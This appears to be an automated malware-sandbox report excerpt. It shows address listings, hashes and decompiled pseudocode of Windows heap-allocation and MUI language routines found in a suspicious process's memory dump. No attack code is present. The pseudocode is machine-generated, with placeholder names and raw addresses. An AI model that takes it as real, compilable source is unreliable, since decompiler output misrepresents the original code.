                    0x016d1e34
                    0x016d1e36
                    0x016d1e3c
                    0x016d1e3c
                    0x016d1e3c
                    0x016d1e3c
                    0x016d1e36
                    0x016d1e42
                    0x016d1e45
                    0x016d1e47
                    0x0168a3f8
                    0x0168a3f8
                    0x0168a3fb
                    0x0168a3fd
                    0x016d1e50
                    0x0168a403
                    0x0168a411
                    0x0168a411
                    0x0168a411
                    0x0168a41e
                    0x0168a420
                    0x0168a424
                    0x0168a427
                    0x0168a7c9
                    0x0168a7cd
                    0x0168a7d2
                    0x0168a7d9
                    0x0168a7e0
                    0x0168a7e3
                    0x0168a7ed
                    0x0168a7f3
                    0x0168a7f9
                    0x0168a7ff
                    0x0168a802
                    0x0168a807
                    0x0168a809
                    0x0168a809
                    0x0168a809
                    0x0168a80f
                    0x0168a80f
                    0x0168a812
                    0x0168a81c
                    0x0168a821
                    0x0168a824
                    0x0168a42d
                    0x0168a42d
                    0x0168a42d
                    0x0168a42d
                    0x0168a42d
                    0x0168a436
                    0x0168a43a
                    0x0168a609
                    0x0168a60d
                    0x0168a612
                    0x0168a616
                    0x0168a61a
                    0x016d1e57
                    0x016d1e59
                    0x00000000
                    0x00000000
                    0x016d1e5f
                    0x0168a620
                    0x0168a627
                    0x016d1e64
                    0x016d1e66
                    0x016d1e6c
                    0x016d1e72
                    0x016d1e76
                    0x016d1e95
                    0x016d1e9a
                    0x016d1e78
                    0x016d1e8d
                    0x016d1e92
                    0x016d1ea0
                    0x016d1ea5
                    0x016d1eaa
                    0x016d1eb2
                    0x016d1eb6
                    0x016d1eb9
                    0x016d1eb9
                    0x016d1ebe
                    0x016d1ec2
                    0x016d1ec2
                    0x016d1e66
                    0x0168a62d
                    0x0168a633
                    0x0168a636
                    0x0168a63a
                    0x0168a63c
                    0x0168a640
                    0x0168a642
                    0x0168a644
                    0x0168a644
                    0x0168a644
                    0x0168a64d
                    0x0168a64d
                    0x0168a651
                    0x0168a655
                    0x016d1eca
                    0x016d1ed1
                    0x00000000
                    0x00000000
                    0x016d1ed7
                    0x00000000
                    0x0168a65b
                    0x0168a669
                    0x0168a66e
                    0x0168a670
                    0x00000000
                    0x00000000
                    0x0168a676
                    0x0168a67b
                    0x0168a680
                    0x0168a682
                    0x016d1f1a
                    0x0168a688
                    0x0168a688
                    0x0168a688
                    0x0168a68a
                    0x0168a68d
                    0x016d1f24
                    0x016d1f2a
                    0x016d1f31
                    0x016d1f43
                    0x016d1f43
                    0x016d1f31
                    0x0168a693
                    0x0168a697
                    0x0168a69d
                    0x0168a6a0
                    0x0168a6a6
                    0x0168a6a8
                    0x0168a6a8
                    0x0168a6a8
                    0x0168a6a8
                    0x0168a6b2
                    0x0168a6b7
                    0x0168a6c1
                    0x0168a6c6
                    0x0168a6d2
                    0x0168a6d9
                    0x0168a6e3
                    0x0168a6e6
                    0x0168a6eb
                    0x0168a6ed
                    0x0168a6ed
                    0x0168a6ed
                    0x0168a6ed
                    0x0168a6f3
                    0x0168a6f8
                    0x0168a702
                    0x0168a70a
                    0x0168a70e
                    0x0168a71a
                    0x0168a71e
                    0x016d1fcb
                    0x016d1fcf
                    0x016d1fdd
                    0x016d1fe3
                    0x016d1fe3
                    0x0168a724
                    0x0168a728
                    0x0168a72a
                    0x0168a72d
                    0x0168a737
                    0x0168a73a
                    0x0168a73c
                    0x0168a742
                    0x0168a748
                    0x016d1f4d
                    0x016d1f50
                    0x016d1f56
                    0x016d1f5c
                    0x016d1f5f
                    0x016d1f7e
                    0x016d1f83
                    0x016d1f61
                    0x016d1f76
                    0x016d1f7b
                    0x016d1f89
                    0x016d1f8e
                    0x016d1f93
                    0x016d1f94
                    0x016d1f9a
                    0x016d1f9c
                    0x016d1f9e
                    0x016d1fa1
                    0x016d1fa1
                    0x016d1fa6
                    0x016d1fa6
                    0x016d1f50
                    0x0168a74e
                    0x0168a751
                    0x0168a754
                    0x0168a75d
                    0x0168a75e
                    0x0168a762
                    0x0168a767
                    0x016d1faf
                    0x016d1fb0
                    0x016d1fb9
                    0x016d1fbe
                    0x016d1fc2
                    0x016d1fc2
                    0x0168a76d
                    0x0168a76d
                    0x0168a775
                    0x0168a778
                    0x0168a77d
                    0x0168a77d
                    0x0168a71e
                    0x0168a782
                    0x0168a787
                    0x0168a789
                    0x016d1ff3
                    0x0168a78f
                    0x0168a78f
                    0x0168a78f
                    0x0168a791
                    0x0168a794
                    0x016d1ffd
                    0x016d2006
                    0x016d200c
                    0x016d2017
                    0x016d2019
                    0x016d2024
                    0x016d2024
                    0x016d2024
                    0x016d2047
                    0x016d2047
                    0x016d200c
                    0x0168a79a
                    0x0168a79f
                    0x0168a7a4
                    0x0168a7a9
                    0x0168a7ab
                    0x016d205a
                    0x0168a7b1
                    0x0168a7b1
                    0x0168a7b1
                    0x0168a7b3
                    0x0168a7b6
                    0x00000000
                    0x0168a7bc
                    0x016d2066
                    0x016d2068
                    0x016d2073
                    0x016d2073
                    0x016d2073
                    0x016d2078
                    0x016d2079
                    0x016d207d
                    0x00000000
                    0x016d207d
                    0x0168a7b6
                    0x0168a440
                    0x0168a440
                    0x0168a440
                    0x0168a446
                    0x0168a44c
                    0x0168a44f
                    0x0168a453
                    0x0168a455
                    0x016d20b3
                    0x016d20b9
                    0x016d20b9
                    0x0168a45d
                    0x0168a460
                    0x0168a464
                    0x0168a466
                    0x0168a46b
                    0x0168a46f
                    0x0168a471
                    0x0168a471
                    0x0168a471
                    0x0168a474
                    0x0168a479
                    0x0168a47d
                    0x0168a47f
                    0x016d2229
                    0x016d222f
                    0x0168a3c8
                    0x0168a3c8
                    0x0168a3ca
                    0x0168a3ca
                    0x00000000
                    0x0168a3ca
                    0x016d2235
                    0x016d223a
                    0x016d223a
                    0x00000000
                    0x00000000
                    0x016d2240
                    0x016d2246
                    0x016d224a
                    0x016d2269
                    0x016d226e
                    0x016d224c
                    0x016d2261
                    0x016d2266
                    0x016d2274
                    0x016d2279
                    0x016d227e
                    0x016d2286
                    0x016d2288
                    0x016d228d
                    0x016d228d
                    0x016d2292
                    0x016d2292
                    0x016d2295
                    0x016d2295
                    0x00000000
                    0x016d2295
                    0x0168a485
                    0x0168a489
                    0x0168a48b
                    0x0168a48f
                    0x0168a493
                    0x0168a497
                    0x0168a49b
                    0x0168a4bb
                    0x0168a4bb
                    0x0168a4bd
                    0x0168a4ff
                    0x0168a4ff
                    0x0168a501
                    0x0168a505
                    0x0168a50f
                    0x0168a517
                    0x0168a51b
                    0x0168a527
                    0x0168a52b
                    0x016d2182
                    0x016d2185
                    0x016d2193
                    0x016d2199
                    0x016d2199
                    0x0168a531
                    0x0168a535
                    0x0168a538
                    0x0168a548
                    0x0168a54b
                    0x0168a54d
                    0x0168a553
                    0x0168a559
                    0x016d2100
                    0x016d2103
                    0x016d2109
                    0x016d210f
                    0x016d2112
                    0x016d2131
                    0x016d2136
                    0x016d2114
                    0x016d2129
                    0x016d212e
                    0x016d213c
                    0x016d2141
                    0x016d2147
                    0x016d214d
                    0x016d2151
                    0x016d2154
                    0x016d2154
                    0x016d2159
                    0x016d2159
                    0x016d2103
                    0x0168a55f
                    0x0168a562
                    0x0168a565
                    0x0168a567
                    0x016d2162
                    0x0168a56d
                    0x0168a574
                    0x0168a575
                    0x0168a579
                    0x0168a57e
                    0x016d2169
                    0x016d216a
                    0x016d2170
                    0x016d2175
                    0x016d2179
                    0x016d2179
                    0x0168a57e
                    0x0168a584
                    0x0168a58f
                    0x0168a58f
                    0x0168a52b
                    0x0168a5ad
                    0x0168a5bc
                    0x0168a5c1
                    0x0168a5c6
                    0x0168a5cb
                    0x0168a5cd
                    0x016d21a9
                    0x0168a5d3
                    0x0168a5d3
                    0x0168a5d3
                    0x0168a5d5
                    0x0168a5d8
                    0x016d21b3
                    0x016d21bc
                    0x016d21c2
                    0x016d21cd
                    0x016d21cf
                    0x016d21da
                    0x016d21da
                    0x016d21da
                    0x016d21f7
                    0x016d21f7
                    0x016d21c2
                    0x0168a5de
                    0x0168a5e3
                    0x0168a5e8
                    0x0168a5ea
                    0x016d220a
                    0x0168a5f0
                    0x0168a5f0
                    0x0168a5f0
                    0x0168a5f2
                    0x0168a5f5
                    0x016d2219
                    0x016d221b
                    0x016d208c
                    0x016d208c
                    0x016d208c
                    0x016d2095
                    0x016d2096
                    0x016d2097
                    0x016d2098
                    0x016d20a4
                    0x016d20a5
                    0x016d20a9
                    0x016d20a9
                    0x00000000
                    0x0168a5f5
                    0x0168a4bf
                    0x0168a4d3
                    0x0168a4d8
                    0x0168a4da
                    0x016d1ede
                    0x016d1ede
                    0x016d1ee4
                    0x016d1ee9
                    0x00000000
                    0x00000000
                    0x016d1f07
                    0x00000000
                    0x016d1f07
                    0x0168a4e0
                    0x0168a4e5
                    0x0168a4e7
                    0x016d20cb
                    0x0168a4ed
                    0x0168a4ed
                    0x0168a4ed
                    0x0168a4f2
                    0x0168a4f5
                    0x016d20d5
                    0x016d20de
                    0x016d20e4
                    0x016d20f6
                    0x016d20f6
                    0x016d20e4
                    0x0168a4fb
                    0x00000000
                    0x0168a4fb
                    0x0168a4a1
                    0x0168a4a4
                    0x0168a4a8
                    0x00000000
                    0x00000000
                    0x0168a4aa
                    0x0168a4ac
                    0x00000000
                    0x00000000
                    0x0168a4b2
                    0x0168a4b5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0168a4b5
                    0x0168a43a
                    0x0168a340
                    0x0168a346
                    0x0168a600
                    0x00000000
                    0x0168a600
                    0x0168a34f
                    0x0168a351
                    0x0168a358
                    0x0168a3c6
                    0x00000000
                    0x0168a371
                    0x0168a37a
                    0x0168a37f
                    0x0168a382
                    0x0168a384
                    0x0168a394
                    0x00000000
                    0x0168a396
                    0x0168a399
                    0x0168a3a7
                    0x0168a3b0
                    0x0168a3b4
                    0x0168a3bb
                    0x0168a3d2
                    0x0168a3da
                    0x0168a3df
                    0x0168a3e1
                    0x0168a3e5
                    0x0168a3ea
                    0x0168a3f0
                    0x0168a3f0
                    0x0168a3e1
                    0x00000000
                    0x0168a3bb
                    0x0168a394

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-523794902
                    • Opcode ID: b1f50edbd17dcd08a5795aa8343eec6fb088aad7b1c8b90bf59f2039284263d0
                    • Instruction ID: ecb14a65071dac3757e8e404c58f3457126c4e201376e7e8589b99456752c266
                    • Opcode Fuzzy Hash: b1f50edbd17dcd08a5795aa8343eec6fb088aad7b1c8b90bf59f2039284263d0
                    • Instruction Fuzzy Hash: 2542F1716047419FC715EF68CC94B2ABBE6FF84204F044A6EE986CB352D774D982CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01722D82 Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 64%
                    			E01722D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x1740e80);
				E016BD0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E016640E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E017230C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E0166B150();
						} else {
							E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E0166B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E0167EEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E01724496(_t181, 0);
						_t177 = L01684620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E017249A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E0171FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E01661F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E016916C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E01724496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x1756360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x1756364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1756366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E0166B150();
								} else {
									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0170D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E0166B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E0166B150();
								} else {
									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E0166B150("Just allocated block at %p for %Ix bytes\n",  *0x1756360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x1756378 = 1;
									 *0x17560c0 = 0;
									asm("int3");
									 *0x1756378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x1755708; // 0x0
					 *0x175b1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E016BD130(0, _t177, _t181);
				}
			}





















                    0x01722d82
                    0x01722d84
                    0x01722d89
                    0x01722d8e
                    0x01722d90
                    0x01722d92
                    0x01722d97
                    0x01722d9a
                    0x01722da4
                    0x01722dc0
                    0x01722dc3
                    0x01722dd1
                    0x01722dd6
                    0x01722dd8
                    0x017230a7
                    0x017230a7
                    0x017230aa
                    0x017230aa
                    0x017230ad
                    0x017230b4
                    0x00000000
                    0x017230b9
                    0x01722de3
                    0x01722de8
                    0x01722deb
                    0x01722dee
                    0x01722df1
                    0x01722df3
                    0x01722dfb
                    0x01722dfb
                    0x01722df5
                    0x01722df5
                    0x01722df5
                    0x01722e04
                    0x01722e0a
                    0x01722e0d
                    0x01722e11
                    0x01722e11
                    0x01722e12
                    0x01722e15
                    0x01722e18
                    0x01722e1a
                    0x01723027
                    0x01723027
                    0x0172302d
                    0x01723030
                    0x0172304f
                    0x01723054
                    0x01723032
                    0x01723047
                    0x0172304c
                    0x0172305a
                    0x01723063
                    0x00000000
                    0x01722e20
                    0x01722e20
                    0x01722e23
                    0x00000000
                    0x00000000
                    0x01722e29
                    0x01722e2b
                    0x01722e47
                    0x01722e2d
                    0x01722e33
                    0x01722e38
                    0x01722e3f
                    0x01722e42
                    0x01722e42
                    0x01722e4e
                    0x01722e5d
                    0x01722e5f
                    0x01722e62
                    0x01722e66
                    0x01722e6b
                    0x01722e6d
                    0x00000000
                    0x01722e73
                    0x01722e73
                    0x01722e76
                    0x01722e7a
                    0x01722e83
                    0x01722e83
                    0x01722e83
                    0x01722e85
                    0x01722e87
                    0x01722e8a
                    0x01722e8d
                    0x01722e92
                    0x01722e9c
                    0x01722e9f
                    0x01722ea1
                    0x01722ea2
                    0x01722ea6
                    0x01722ea6
                    0x01722e9f
                    0x01722eab
                    0x01722eaf
                    0x01722edf
                    0x01722ee2
                    0x01722ee5
                    0x01722eb1
                    0x01722eb3
                    0x01722eb8
                    0x01722ebd
                    0x01722ec4
                    0x01722ed6
                    0x01722ec6
                    0x01722ec7
                    0x01722ecc
                    0x01722ecf
                    0x01722ed2
                    0x01722ed2
                    0x01722ed9
                    0x01722ed9
                    0x01722ee8
                    0x01722eeb
                    0x01722eef
                    0x01722ef2
                    0x01722efe
                    0x01722f04
                    0x01722f04
                    0x01722f04
                    0x01722f06
                    0x01722f0d
                    0x01722f0f
                    0x01722f13
                    0x01722f13
                    0x01722f1b
                    0x01722f21
                    0x01722f27
                    0x01722f95
                    0x01722f98
                    0x01722f9b
                    0x01722fa0
                    0x00000000
                    0x00000000
                    0x01722fa6
                    0x01722fa9
                    0x01722fac
                    0x00000000
                    0x00000000
                    0x01722fb2
                    0x01722fb9
                    0x00000000
                    0x00000000
                    0x01722fc3
                    0x01722fca
                    0x00000000
                    0x00000000
                    0x01722fd0
                    0x01722fd6
                    0x01722fd9
                    0x01722ff8
                    0x01722ffd
                    0x01722fdb
                    0x01722ff0
                    0x01722ff5
                    0x0172300e
                    0x0172300f
                    0x0172301a
                    0x00000000
                    0x01722f29
                    0x01722f29
                    0x01722f2c
                    0x01722f4b
                    0x01722f50
                    0x01722f2e
                    0x01722f43
                    0x01722f48
                    0x01722f56
                    0x01722f64
                    0x01722f6c
                    0x01722f6c
                    0x01722f72
                    0x01722f76
                    0x01722f7c
                    0x01722f83
                    0x01722f89
                    0x01722f8a
                    0x01722f8a
                    0x00000000
                    0x01722f76
                    0x01722f27
                    0x01722e6d
                    0x01722da6
                    0x01722dab
                    0x01722db3
                    0x01722db9
                    0x017230bc
                    0x017230c1
                    0x017230c1

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                    • API String ID: 0-1745908468
                    • Opcode ID: 91deb1bc1ca50bd949f38fe0291b48419f348b9cf8fb9d4ca7f38f5d595fd18d
                    • Instruction ID: 1041ee9f4f853e2a65f9b06e521371111963ac2e99f02b02021e85416db08bdd
                    • Opcode Fuzzy Hash: 91deb1bc1ca50bd949f38fe0291b48419f348b9cf8fb9d4ca7f38f5d595fd18d
                    • Instruction Fuzzy Hash: 1E913631A00691DFDB26DFA8C844AADFBF3FF49610F18805DE5469B252C739D982CB14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01673D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E01673D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01671B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01671B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01671B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01671B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01671B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01684620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E016AF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E016B1370(_t276, 0x1644e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E016ABB40(0,  &_v68, _t170);
									if(L016743C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E016ABB40(_t257,  &_v68, _t243);
								if(L016743C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E016B1370(_t278, 0x1644e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01684620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E016AF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E016B1370(_v16, 0x1644e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E016ABB40(_t262,  &_v68, _t244);
								if(L016743C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E016B1370(_t282, 0x1644e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E016ABB40(_t262,  &_v68, _t201);
							if(L016743C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01684620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E016AF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E016B1370(_t280, 0x1644e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E016ABB40(_t267,  &_v68, _t245);
							if(L016743C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E016B1370(_t284, 0x1644e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
